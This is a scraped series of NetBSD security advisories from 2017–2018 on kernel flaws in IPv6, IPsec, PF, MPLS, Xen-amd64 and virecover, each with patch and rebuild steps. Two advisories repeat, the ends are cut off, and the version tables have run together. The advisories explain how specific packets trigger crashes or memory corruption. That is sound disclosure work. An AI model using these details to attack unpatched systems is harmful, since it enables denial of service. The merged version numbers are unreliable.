multicast) entry point. This could cause the kernel to panic. 4) Two sysctls wrongfully allowed IPv4 source-routed packets to be accepted by the kernel. Source-routed packets are known to have several security implications. 5) A signedness bug existed in NetBSD's implementation of the PF firewall. A length check was unintentionally made unsigned, while it was expected to be signed. This could cause a read overflow (leading to a page fault) if a specially-crafted TCP-SYN packet was received while PF had a configuration of the type "pass in [...] tcp [...] modulate state". Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/net/if_mpls.c 1.33 1.16.2.1 1.16.6.1 1.16.10.1 src/sys/netmpls/mpls_ttl.c 1.9 1.4.4.1 1.4.8.11.4.12.1 src/sys/netinet6/nd6_nbr.c 1.1451.100.2.31.100.2.2.2.1 1.100.2.2.6.1 src/sys/netinet6/ip6_mroute.c 1.1201.107.2.11.107.6.1 1.107.10.1 src/sys/netinet/ip_input.c 1.3661.319.2.11.319.6.1 1.319.10.1 src/sys/dist/pf/net/pf.c 1.78 1.72.2.1 1.72.6.1 1.72.10.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/net/if_mpls.c 1.8.8.2 1.8.14.2 1.8.22.2 src/sys/netmpls/mpls_ttl.c 1.3.18.1 1.3.24.1 1.3.32.1 src/sys/netinet6/nd6_nbr.c 1.95.2.1 1.95.6.1 1.95.8.1 src/sys/netinet6/ip6_mroute.c 1.103.2.11.103.8.1 1.103.16.1 src/sys/netinet/ip_input.c 1.298.2.11.298.6.1 1.298.8.1 src/sys/dist/pf/net/pf.c 1.68.2.1 1.68.6.1 1.68.8.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/net/if_mpls.c # cvs update -d -P -r VERSION sys/netmpls/mpls_ttl.c # cvs update -d -P -r VERSION sys/netinet6/nd6_nbr.c # cvs update -d -P -r VERSION sys/netinet6/ip6_mroute.c # cvs update -d -P -r VERSION sys/netinet/ip_input.c # cvs update -d -P -r VERSION sys/dist/pf/net/pf.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing issues 1) 2) 3) 4), Lucio Albornoz for reporting a problem that was discovered
NetBSD Security Advisory 2018-005: Privilege separation bug in Xen-amd64
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-005 = Topic: Privilege separation bug in Xen-amd64 Version:NetBSD-current: source prior to Sun, Dec 31st 2017 NetBSD 7.1.2: not affected NetBSD 7.1 - 7.1.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Privilege escalation / Local DoS Fixed: NetBSD-current: Sun, Dec 31st 2017 NetBSD-7-1 branch: Mon, Jan 22nd 2018 NetBSD-7-0 branch: Mon, Jan 22nd 2018 NetBSD-7 branch:Mon, Jan 22nd 2018 NetBSD-6-1 branch: Mon, Feb 19th 2018 NetBSD-6-0 branch: Mon, Feb 19th 2018 NetBSD-6 branch:Mon, Feb 19th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A mistake the Xen-amd64 port of NetBSD allowed unprivileged users to read from and write to the CPU's I/O ports. This could be used to escalate privileges. Technical Details = The kernel uses several flags that define CPU protections, and in particular, SEL_KPL and SEL_UPL, that respectively define "kernel" privileges and "user" privileges in the %cs register. 64bit Xen PV guests run, by design, in ring3, the same protection level as userland. As a result, SEL_KPL equals SEL_UPL. Xen uses a specific iopl privilege mechanism to control access rights to the CPU I/O ports: it expects the iopl value to match the intended privilege, and not the hardware privilege. Therefore, if the kernel wanted to prevent userland from accessing the CPU I/O ports, it had to set the iopl to ring0, even if the kernel actually runs in ring3. A mistake existed in NetBSD, where iopl was unintentionally set to ring3, allowing userland to access CPU I/O ports. The mistake in question was a confusion with the privilege flags: iopl was set to SEL_KPL, but in the case of Xen-amd64 this was equal to SEL_UPL, which meant ring3. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/arch/amd64/amd64/machdep.c 1.2801.211.2.21.211.6.2 1.211.10.2 src/sys/arch/amd64/include/segments.h 1.34 1.24.12.11.24.16.1 1.24.22.1 src/sys/arch/i386/i386/machdep.c 1.8001.752.4.21.752.8.2 1.752.12.2 src/sys/arch/i386/include/segments.h 1.64 1.54.30.11.54.34.1 1.54.38.1 src/sys/arch/x86/x86/vm_machdep.c 1.30 1.25.4.2 1.25.8.2 1.25.4.1.2.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/arch/amd64/amd64/machdep.c 1.175.2.10 1.175.2.7.2.3 1.175.2.8.2.2 src/sys/arch/amd64/include/segments.h 1.22.10.11.22.14.1 1.22.16.1 src/sys/arch/i386/i386/machdep.c 1.717.2.91.717.2.7.4.2 1.717.2.7.6.2 src/sys/arch/i386/include/segments.h 1.54.10.11.54.16.1 1.54.24.1 src/sys/arch/x86/x86/vm_machdep.c 1.14.2.1 1.14.6.1 1.14.8.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/arch/amd64/amd64/machdep.c # cvs update -d -P -r VERSION sys/arch/amd64/include/segments.h # cvs update -d -P -r VERSION sys/arch/i386/i386/machdep.c # cvs update -d -P -r VERSION sys/arch/i386/include/segments.h # cvs update -d -P -r VERSION sys/arch/x86/x86/vm_machdep.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing the issue. Revision History 2018-04-09 Initial release More Information Advisories may be updated as new information becomes
NetBSD Security Advisory 2018-004: Remote Memory Corruption in IPv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-004 = Topic: Remote Memory Corruption in IPv6 Version:NetBSD-current: source prior to Tue, Jan 30th 2018 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Tue, Jan 30th 2018 NetBSD-7-1 branch: Tue, Jan 30th 2018 NetBSD-7-0 branch: Tue, Jan 30th 2018 NetBSD-7 branch:Tue, Jan 30th 2018 NetBSD-6-1 branch: Tue, Jan 30th 2018 NetBSD-6-0 branch: Tue, Jan 30th 2018 NetBSD-6 branch:Tue, Jan 30th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A mistake in the way received IPv6 packets are handled allowed an attacker to remotely trigger a memory corruption. Technical Details = When a packet is received, the kernel stores it in memory as chain of mbufs. An mbuf is basically a block of contiguous memory. A function, located deep into the IPv6 entry point, was not performing the necessary checks when treating a received IPv6 packet. It was parsing the IPv6 options assuming they were located in the first mbuf of the chain, but this assumption was incorrect. Therefore, it was possible for this function to return a pointer that pointed to an area located after the first mbuf. This pointer was then either read from, or written to with one byte that could be controlled by the packet. It has been demonstrated that by sending a special combination of nested IPv6 fragments, this bug could be exploited remotely, and could allow an attacker to cause the kernel to behave unexpectedly because random areas of memory were overwritten. It is not clear whether this attack could be turned to a code execution attack. The PF firewall can mitigate this particular attack, because it rejects nested IPv6 fragments by default. NPF does not reject such fragments by default. The status of IPF in this regard has not been investigated. It is possible that other vectors than IPv6 fragments could trigger this vulnerability. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/netinet6/frag6.c 1.65 1.55.4.1 1.55.6.1 1.55.10.1 src/sys/netinet6/ip6_input.c 1.1871.149.2.21.149.2.1.2.1 1.149.2.1.6.1 src/sys/netinet6/ip6_var.h 1.78 1.62.2.2 1.62.2.1.2.1 1.62.2.1.6.1 src/sys/netinet6/raw_ip6.c 1.1601.136.2.21.136.6.1 1.136.2.1.2.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/netinet6/frag6.c 1.52.2.3 1.52.2.1.4.2 1.52.2.2.2.1 src/sys/netinet6/ip6_input.c 1.136.2.21.136.6.2 1.136.8.2 src/sys/netinet6/ip6_var.h 1.58.2.2 1.58.6.2 1.58.8.2 src/sys/netinet6/raw_ip6.c 1.109.2.11.109.6.1 1.109.8.1 src/sys/netinet6/ah_input.c 1.59.8.1 1.59.12.1 1.59.14.1 src/sys/netinet6/esp_input.c 1.50.8.1 1.50.12.1 1.50.14.1 src/sys/netinet6/ipcomp_input.c 1.38.8.1 1.38.12.1 1.38.14.1 Note: for NetBSD-6, there are three more files that contain the fix. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netinet6/frag6.c # cvs update -d -P -r VERSION sys/netinet6/ip6_input.c # cvs update -d -P -r VERSION sys/netinet6/ip6_var.h # cvs update -d -P -r VERSION sys/netinet6/raw_ip6.c If you run NetBSD-6: # cvs update -d -P -r VERSION sys/netinet6/ah_input.c # cvs update -d -P -r VERSION sys/netinet6/esp_input.c # cvs update -d -P -r VERSION sys/netinet6/ipcomp_input.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp
NetBSD Security Advisory 2018-003: Remote DoS in IPsec (IPv6)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-003 = Topic: Remote DoS in IPsec (IPv6) Version:NetBSD-current: source prior to Wed, Jan 24th 2018 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Wed, Jan 24th 2018 NetBSD-7-1 branch: Mon, Jan 29th 2018 NetBSD-7-0 branch: Mon, Jan 29th 2018 NetBSD-7 branch:Mon, Jan 29th 2018 NetBSD-6-1 branch: Mon, Jan 29th 2018 NetBSD-6-0 branch: Mon, Jan 29th 2018 NetBSD-6 branch:Mon, Jan 29th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A mistake in the way IPsec parses IPv6-AH packets allowed an attacker to remotely crash the kernel with a single IPv6 packet. Technical Details = When receiving an IPv6-AH packet, IPsec must zero out the IPv6 options that are mutable. To achieve that, it must find the IPPROTO_HOPOPTS and IPPROTO_DSTOPTS options, and iterate over the suboptions they contain. A suboption is made of a header and a payload. The header is two-byte-sized: the second byte indicates the length of the payload, but does not count the size of the suboption header itself. A mistake existed in the suboption iteration procedure: the parser's loop was incremented by the length of the payload, but was not added an additional two bytes. Therefore, if a suboption had a 'length' field of zero, the kernel would enter an infinite loop. By sending a single IPv6-AH packet with a suboption of length zero, an attacker could remotely make the kernel unresponsive. Moreover, the suboption parser was written with the assumption that an incoming IPv6 packet already went through the generic IPv6 parser, and that therefore several fields were already guaranteed to be valid. Because of the aforementioned bug, this assumption did not hold anymore, and it was possible for an attacker to remotely trigger a buffer overflow that would fill with zeros an area that extends beyond the buffer containing the packet. Important Note == Several other issues have been, and are being, identified in the IPsec code. It is not yet clear whether they are exploitable or not, but the fixes are being propagated to the Stable branches. Therefore, while a Security Advisory may not be available shortly, it is recommended that users of IPsec keep their systems up-to-date. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/netipsec/xform_ah.c 1.76 1.42.4.1 1.42.8.1 1.42.12.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/netipsec/xform_ah.c 1.37.2.1 1.37.6.1 1.37.8.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netipsec/xform_ah.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing the issue. Revision History 2018-02-12 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-0XX.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2018, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE-
NetBSD Security Advisory 2018-004: Remote Memory Corruption in IPv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-004 = Topic: Remote Memory Corruption in IPv6 Version:NetBSD-current: source prior to Tue, Jan 30th 2018 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Tue, Jan 30th 2018 NetBSD-7-1 branch: Tue, Jan 30th 2018 NetBSD-7-0 branch: Tue, Jan 30th 2018 NetBSD-7 branch:Tue, Jan 30th 2018 NetBSD-6-1 branch: Tue, Jan 30th 2018 NetBSD-6-0 branch: Tue, Jan 30th 2018 NetBSD-6 branch:Tue, Jan 30th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A mistake in the way received IPv6 packets are handled allowed an attacker to remotely trigger a memory corruption. Technical Details = When a packet is received, the kernel stores it in memory as chain of mbufs. An mbuf is basically a block of contiguous memory. A function, located deep into the IPv6 entry point, was not performing the necessary checks when treating a received IPv6 packet. It was parsing the IPv6 options assuming they were located in the first mbuf of the chain, but this assumption was incorrect. Therefore, it was possible for this function to return a pointer that pointed to an area located after the first mbuf. This pointer was then either read from, or written to with one byte that could be controlled by the packet. It has been demonstrated that by sending a special combination of nested IPv6 fragments, this bug could be exploited remotely, and could allow an attacker to cause the kernel to behave unexpectedly because random areas of memory were overwritten. It is not clear whether this attack could be turned to a code execution attack. The PF firewall can mitigate this particular attack, because it rejects nested IPv6 fragments by default. NPF does not reject such fragments by default. The status of IPF in this regard has not been investigated. It is possible that other vectors than IPv6 fragments could trigger this vulnerability. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/netinet6/frag6.c 1.65 1.55.4.1 1.55.6.1 1.55.10.1 src/sys/netinet6/ip6_input.c 1.1871.149.2.21.149.2.1.2.1 1.149.2.1.6.1 src/sys/netinet6/ip6_var.h 1.78 1.62.2.2 1.62.2.1.2.1 1.62.2.1.6.1 src/sys/netinet6/raw_ip6.c 1.1601.136.2.21.136.6.1 1.136.2.1.2.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/netinet6/frag6.c 1.52.2.3 1.52.2.1.4.2 1.52.2.2.2.1 src/sys/netinet6/ip6_input.c 1.136.2.21.136.6.2 1.136.8.2 src/sys/netinet6/ip6_var.h 1.58.2.2 1.58.6.2 1.58.8.2 src/sys/netinet6/raw_ip6.c 1.109.2.11.109.6.1 1.109.8.1 src/sys/netinet6/ah_input.c 1.59.8.1 1.59.12.1 1.59.14.1 src/sys/netinet6/esp_input.c 1.50.8.1 1.50.12.1 1.50.14.1 src/sys/netinet6/ipcomp_input.c 1.38.8.1 1.38.12.1 1.38.14.1 Note: for NetBSD-6, there are three more files that contain the fix. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netinet6/frag6.c # cvs update -d -P -r VERSION sys/netinet6/ip6_input.c # cvs update -d -P -r VERSION sys/netinet6/ip6_var.h # cvs update -d -P -r VERSION sys/netinet6/raw_ip6.c If you run NetBSD-6: # cvs update -d -P -r VERSION sys/netinet6/ah_input.c # cvs update -d -P -r VERSION sys/netinet6/esp_input.c # cvs update -d -P -r VERSION sys/netinet6/ipcomp_input.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp
NetBSD Security Advisory 2018-003: Remote DoS in IPsec (IPv6)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-003 = Topic: Remote DoS in IPsec (IPv6) Version:NetBSD-current: source prior to Wed, Jan 24th 2018 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Wed, Jan 24th 2018 NetBSD-7-1 branch: Mon, Jan 29th 2018 NetBSD-7-0 branch: Mon, Jan 29th 2018 NetBSD-7 branch:Mon, Jan 29th 2018 NetBSD-6-1 branch: Mon, Jan 29th 2018 NetBSD-6-0 branch: Mon, Jan 29th 2018 NetBSD-6 branch:Mon, Jan 29th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A mistake in the way IPsec parses IPv6-AH packets allowed an attacker to remotely crash the kernel with a single IPv6 packet. Technical Details = When receiving an IPv6-AH packet, IPsec must zero out the IPv6 options that are mutable. To achieve that, it must find the IPPROTO_HOPOPTS and IPPROTO_DSTOPTS options, and iterate over the suboptions they contain. A suboption is made of a header and a payload. The header is two-byte-sized: the second byte indicates the length of the payload, but does not count the size of the suboption header itself. A mistake existed in the suboption iteration procedure: the parser's loop was incremented by the length of the payload, but was not added an additional two bytes. Therefore, if a suboption had a 'length' field of zero, the kernel would enter an infinite loop. By sending a single IPv6-AH packet with a suboption of length zero, an attacker could remotely make the kernel unresponsive. Moreover, the suboption parser was written with the assumption that an incoming IPv6 packet already went through the generic IPv6 parser, and that therefore several fields were already guaranteed to be valid. Because of the aforementioned bug, this assumption did not hold anymore, and it was possible for an attacker to remotely trigger a buffer overflow that would fill with zeros an area that extends beyond the buffer containing the packet. Important Note == Several other issues have been, and are being, identified in the IPsec code. It is not yet clear whether they are exploitable or not, but the fixes are being propagated to the Stable branches. Therefore, while a Security Advisory may not be available shortly, it is recommended that users of IPsec keep their systems up-to-date. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/netipsec/xform_ah.c 1.76 1.42.4.1 1.42.8.1 1.42.12.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/netipsec/xform_ah.c 1.37.2.1 1.37.6.1 1.37.8.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netipsec/xform_ah.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing the issue. Revision History 2018-02-12 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-0XX.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2018, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE-
NetBSD Security Advisory 2018-002: Local DoS in virecover
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-002 = Topic: Local DoS in virecover Version:NetBSD-current: source prior to Sat, November 4th 2017 NetBSD 7.0 - 7.02: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Local Denial of Service Fixed: NetBSD-current: Sat, November 4th 2017 NetBSD-6-0 branch: Sun, November 5th 2017 NetBSD-6-1 branch: Sun, November 5th 2017 NetBSD-6 branch:Sun, November 5th 2017 NetBSD-7-0 branch: Sun, November 5th 2017 NetBSD-7 branch:Sun, November 5th 2017 NetBSD-8 branch:Sun, November 5th 2017 Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An error in the virecover script allows an unprivileged user to delete any files in the root / directory. Technical Details = The virecover shell script used file globbing without arranging for whitespace within filenames to be preserved. Instead of treating a filename containing a space as is, it will treat the file as two files. For example, by placing "/var/tmp/virecover/vi. netbsd", virecover will treat it as two files: /var/tmp/virecover/vi. and netbsd. As virecover attempts to delete the recovered files, it will delete files in its current working directory (the root directory). This allows an unprivileged user to delete any file within the root directory. Solutions and Workarounds = Disabling virecover: # echo "virecover=NO" >> /etc/rc.conf Updating nvi: FILE HEAD netbsd-8 netbsd-7 netbsd-7-1 netbsd-7-0 external/bsd/nvi/dist/common/recover.c 1.9 1.5.22.1 1.5.6.1 1.5.18.11.5.10.1 external/bsd/nvi/usr.bin/recover/virecover 1.3 1.1.22.1 1.1.6.1 1.1.18.11.1.10.1 FILE netbsd-6 netbsd-6-1 netbsd-6-0 dist/nvi/common/recover.c 1.3.10.1 1.3.24.1 1.3.16.1 usr.bin/nvi/recover/virecover 1.1.22.1 1.1.36.1 1.1.28.1 for netbsd-7, -7-0, -7-1, netbsd-8, HEAD: $ cd src $ cvs update -d -P -r VERSION external/bsd/nvi/dist/common/recover.c $ cvs update -d -P -r VERSION external/bsd/nvi/usr.bin/recover/virecover $ cd external/bsd/nvi $ make USETOOLS=no # make install USETOOLS=no for netbsd-6, -6-0, -6-1: $ cd src $ cvs update -d -P -r VERSION dist/nvi/common/recover.c $ cvs update -d -P -r VERSION usr.bin/nvi/recover/virecover $ cd usr.bin/nvi $ make USETOOLS=no # make install USETOOLS=no Thanks To Maya Rashish for noticing the issue, Christos Zoulas and Robert Elz for deploying the fix. Revision History 2018-01-02 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-002.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/. Copyright 2018, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJaS7+UAAoJEAZJc6xMSnBuqhgQAJHCyUMeylnsOUGi0SzsZ/G9 kzQVGSir6+U+yKGaEFM5xkuRUoQFOVxCcHo9GXxY5EvxfF3rsYoW6MORzkn5DXAs Yup1HMb5impVdGruED7ubFI155EjLtlI03S3fqgOChH0g1aWwtfP0PlqC1iMl7mp Ygyo7UZEJNOsrAM28WqW5LHQPNVG2q92yl16UwP6UWH8MoydnjCj4WuQ4/D161bQ xFDNgxruxt3R3RqwBnVIPYBRTlxM9xPGpW/dNngc+rVoiyRD3+XzcEvhemY2Eccx Gqp2ohQl+q8rDzKnS2pv+wNdQlgXZVkg5XrfWkP52JBTdAojAfeNP9cWlOoV9ggZ nFzjHnURkodRwosE8AWuJ+aquokqUMtec48NNKVIaRK/LPuJQLz/CWdiM5V0xwqY 0WSK5Yvgl3aM5FwFpWFo78RE3Pl18FaJuqMN3XYWhDuBXLZW7raQK0KXQuWC+E72 PgRqqDU2YswGV3Gt2xbBh74SBnedjwppffNCenSdxjZHjfpFLGr1sS/JGBj/UG1m RfxAA7mbogE/yEjWXLyt8H+y78Id6Ck9rWiKTFUKBXJw7qw05opdewJDsZrOsw6T 40iydSOLl1ahr/Ke2Mu8/B09MUyt8MMrrmthnhoXQr9a2R9iR1fDFxfboocOVCfn BHDNhoPO+m+GSApcBd7p =MHk1 -END PGP SIGNATURE-
NetBSD Security Advisory 2018-001: Several vulnerabilities in context handling
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-001 = Topic: Several vulnerabilities in context handling Version:NetBSD-current: source prior to Sat, Sep 2nd 2017 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Privilege escalation / Local DoS Fixed: NetBSD-current: Sat, Sep 2nd 2017 NetBSD-7-1 branch: Sun, Oct 1st 2017 NetBSD-7-0 branch: Sun, Oct 1st 2017 NetBSD-7 branch:Sun, Oct 1st 2017 NetBSD-6-1 branch: Fri, Oct 13th 2017 NetBSD-6-0 branch: Fri, Oct 13th 2017 NetBSD-6 branch:Fri, Oct 13th 2017 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Several issues were discovered in several ports of NetBSD: 1) sparc64: A missing mask in a syscall could allow userland to control a few bits from a privileged register, allowing privilege escalations. 2) amd64: A subtle mistake in compat_linux32 could allow userland to generate a particular fault in kernel mode, which caused the kernel to get confused and re-enter itself in kernel mode but with the userland Thread-Local Storage. This allowed privilege escalations. 3) i386: An instruction in the #UD exception handler was implicitly using the userland %ds register without sanitizing it. This allowed at least local DoSes. Technical Details = 1) A mistake in a syscall allowed an unprivileged user process to set privileged bits, such as PSTATE_PRIV, in the %pstate register. Upon return to userland the process would then be granted kernel privileges on the hardware. 2) The handling of the GDT on amd64 creates a condition where a page fault can be generated if a segment register is reloaded with a "high" selector, located near the end of the GDT. An incorrect check in a linux32 syscall allowed unprivileged user processes to have the kernel page fault in such a condition. However, the kernel does not correctly handle such exceptions: it re-enters itself but does not switch to the kernel TLS, and instead uses userland's. Userland therefore had a way to control a generic kernel pointer, which allowed for full privilege escalation. 3) The #UD exception handler was implicitly using the %ds register, before it actually initialized it to the kernel value. This allowed userland to crash the system. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- sys/arch/sparc64/sparc64/compat_13_machdep.c 1.24 1.23.38.11.23.42.1 1.23.50.1 sys/compat/linux32/arch/amd64/linux32_machdep.c 1.39 1.36.4.1 1.36.8.1 1.36.14.1 sys/arch/i386/i386/i386_trap.S 1.12 1.5.6.1 1.5.12.1 1.5.20.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- sys/arch/sparc64/sparc64/compat_13_machdep.c 1.23.18.11.23.24.1 1.23.32.1 sys/compat/linux32/arch/amd64/linux32_machdep.c 1.29.10.11.29.14.1 1.29.16.1 sys/arch/i386/i386/vector.S 1.59.8.1 1.59.12.1 1.59.14.1 Note: in NetBSD 6, the fix for 3) is in a different file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/arch/sparc64/sparc64/compat_13_machdep.c # cvs update -d -P -r VERSION sys/compat/linux32/arch/amd64/linux32_machdep.c then, either # cvs update -d -P -r VERSION sys/arch/i386/i386/i386_trap.S or # cvs update -d -P -r VERSION sys/arch/i386/i386/vector.S # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime
NetBSD Security Advisory 2017-006: Vnode reference leak in the openat system call
